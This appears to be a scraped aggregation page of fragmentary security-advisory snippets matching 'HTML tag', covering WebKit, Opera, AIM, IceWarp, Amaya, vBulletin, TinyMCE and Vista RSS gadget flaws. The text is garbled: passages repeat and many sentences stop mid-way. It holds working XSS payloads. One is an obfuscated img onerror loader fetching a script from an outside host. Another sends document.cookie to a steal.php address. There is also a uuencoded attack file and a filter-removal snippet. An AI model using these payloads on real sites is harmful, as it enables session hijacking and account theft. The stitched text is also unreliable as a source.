| New User, Welcome! Login |
HTML tag
Use-after-free vulnerability in WebKit, as used in Apple Safari
before 4.0, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1
through 2.2.1, Google Chrome 1.0.154.53, and possibly other products,
allows remote attackers to execute arbitrary code or cause a denial
of service (memory corruption and application crash) by setting an
unspecified property of an HTML tag that causes child elements to
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690).
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
CVE-2009-1690
Use-after-free vulnerability in WebKit, allows remote attackers to execute
arbitrary code or cause a denial of service (memory corruption and application
crash) by setting an unspecified property of an HTML tag that causes child
elements to be freed and later accessed when an HTML error occurs, related to
"recursion in certain DOM event handlers."
CVE-2009-1698
So, if you find a way to execute your malicious javascript in the feed
subscription page, you can essentially execute native opera functions and
ultimately use it to control the Victim's Opera browser. It looks like
Opera's Team did think about the implications of putting untrusted user
content in this page and hence only permitted a certain whitelist of html
tags. In addition, for some html tags such as "A" and "IMG", it required a
certain precondition to be met. See the code snippets captured using Opera
inbuilt debugger DragonFly (you can also use Firebug lite).
Whitelisted HTML Tags Definition - Opera Feed Subscription Page (Source -
DragonFly)
not have the sender focused within their AIM client. When sending a
message to an AIM user who does not have the sender focused in their AIM
client, a notification window will pop up informing the recipient that
they have just received a message from another AIM user. It is this
application in the AIM 6.x clients that is not properly parsing the
messages for this type of html tag and pop's up an alert window.” The
other public problems pointed out by Core posted in AOL‟s message boards
are not caused by AIM clients. AIM client 6.5.3.12 (currently in Beta)
fixes the reported problems and is available for public download (and for
testing). AOL remains unsuccessful trying to verify that the serverside
filtering mechanism can be bypassed and requests additional data (exact
not have the sender focused within their AIM client. When sending a
message to an AIM user who does not have the sender focused in their AIM
client, a notification window will pop up informing the recipient that
they have just received a message from another AIM user. It is this
application in the AIM 6.x clients that is not properly parsing the
messages for this type of html tag and pop's up an alert window.€? The
other public problems pointed out by Core posted in AOL‟s message boards
are not caused by AIM clients. AIM client 6.5.3.12 (currently in Beta)
fixes the reported problems and is available for public download (and for
testing). AOL remains unsuccessful trying to verify that the serverside
filtering mechanism can be bypassed and requests additional data (exact
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.
More Details
============
To prevent the execution of JavaScript and VBScript code in HTML emails
and to remove unwanted HTML tags, the IceWarp WebMail Server filters HTML
emails with the function cleanHTML() that is defined in the PHP file
html/webmail/server/inc/tools.php
This filtering function can be circumvented in various ways, to still
In detail, the following flaw was determined:
- Safari fails to sanitaze the file protocol handler thus leading to an
information disclosure, e.g. local file theft.
Creating dynamically a certain HTML tag and using a valid file path to
an executable may lead to a Denial of Service condition.
Impact
Multiple stack buffer overflow vulnerabilities have been discovered in
Amaya web editor/browser [1], which can be exploited by unauthorized
people using crafted web pages to compromise a user's system.
A boundary error when processing 'input' HTML tags can be exploited to
cause a stack-based buffer overflow via an overly long 'type' parameter
(Bugtraq ID 33046). Code analysis of the Amaya XHTML parser reveals
multiple unchecked buffers declared on the stack, one of which is used
in the function 'EndOfXmlAttributeValue()':
Use-after-free vulnerability in WebKit, as used in Apple Safari
before 4.0, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1
through 2.2.1, Google Chrome 1.0.154.53, and possibly other products,
allows remote attackers to execute arbitrary code or cause a denial
of service (memory corruption and application crash) by setting an
unspecified property of an HTML tag that causes child elements to
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690)
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that the "user_colors[bg_color]" is not validated and it's used directly inside an echo function.
Sending a trivial HTTP request against PHP environments having register global ON is possible to exploit this unvalidated user input flaw.
In detail, It's necessary to append a close HTML tag </style> before the malicious JavaScript code.
The same problem arises in different point of the same script, for each different theme template:
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
-----------------
malicious file name:
<img src='' onerror='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99,111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))'>
that <img> generate this html tag to make browser load and execute external script:
<script src=http://ilmuhacking.com/x.js></script>
that poc exploit works for both file manager application (standard and legacy).
A vulnerability exists within vBulletin which makes an attacker able to inject
code such as HTML or Javascript via custom BBCode Tags IF they follow certain
conditions which are described below.
Requirements:
- User-input must be located inside a variable in a HTML-tag.
- Apostrophes or nothing must be used for encapsulation.
Insecure Implementations:
---
[*] CSRF + XSS:
This is another way to exploit those two types of attacks (XSS and CSRF). If the administrator see
this page a new folder will be created and the name is going to be a special HTML tag with a
JavaScript script. (uuencoded)
+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(FYE=V9O;&1E<B(@
There are 2 ways to exploit this page
1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable javascript on your Browser and visit vulnerable page
.
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D
--- Exploit (Grabbing Cookies)---
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.
Remote exploitation of a Cross Site Scripting (XSS) vulnerability in the
Windows Vista Sidebar RSS Gadget allows an attacker to execute arbitrary
code with the privileges of the logged in user.
The vulnerability exists within the parsing of the certain elements of
the items in an RSS feed. A properly crafted HTML tag within these
elements will not be removed, and will be rendered by the RSS gadget.
Since the RSS gadget runs in the local zone, the injected JavaScript
has full access to the system.
III. ANALYSIS
CVE-2009-1690
Use-after-free vulnerability in WebKit, as used in qt4-x11, allows remote
attackers to execute arbitrary code or cause a denial of service (memory
corruption and application crash) by setting an unspecified property of
an HTML tag that causes child elements to be freed and later accessed
when an HTML error occurs.
CVE-2009-1698
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to propose a HTML tag.
In some cases single (') or double quotes (") are required to inject the
code in a given HTML statement. Some implementation of security systems
are looking for well-known attack tags as like <script> and attack
attributes onMouseOver too. However, these are usually not capable of
identifying highly optimized payload.
|
|
|
